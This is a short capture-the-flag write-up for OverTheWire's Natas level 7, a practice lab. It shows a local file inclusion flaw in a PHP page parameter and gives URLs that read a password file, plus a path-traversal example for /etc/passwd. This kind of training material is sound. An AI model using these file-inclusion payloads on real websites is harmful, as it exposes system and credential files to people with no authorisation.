Natas Level 7
Natas 7
Solution
if we click on about, the web server will append /index.php?page=about to the end of the url
if we view the page source ../ we see a comment in both pages:
hint: password for webuser natas8 is in /etc/natas_webpass/natas8
if we try to visit /etc/natas_webpass/natas8 directly ... we will encounter Not Found error.
but if we try to visit it while we are in home ... that is: http://natas7.natas.labs.overthewire.org/index.php?page=home/etc/natas_webpass/natas8
we will get a warning which goes like
Warning: include(home/etc/natas_webpass/natas8): failed to open stream: No such file or directory in /var/www/natas/natas7/index.php on line 21
Warning: include(): Failed opening 'home/etc/natas_webpass/natas8' for inclusion (include_path='.:/usr/share/php') in /var/www/natas/natas7/index.php on line 21
error messages are frequently useful for getting a working exploit ... you can see that the web server tried and failed to open filename "home", and also told us the file path.
from here ... we can either use an absolute file path (ex: /etc/passwd) or a relative file path (../../../../etc/passwd).
lets use the absolute file path option, and navigate to http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8. This will include the flag file and display it to us.
<!-- truncate -->
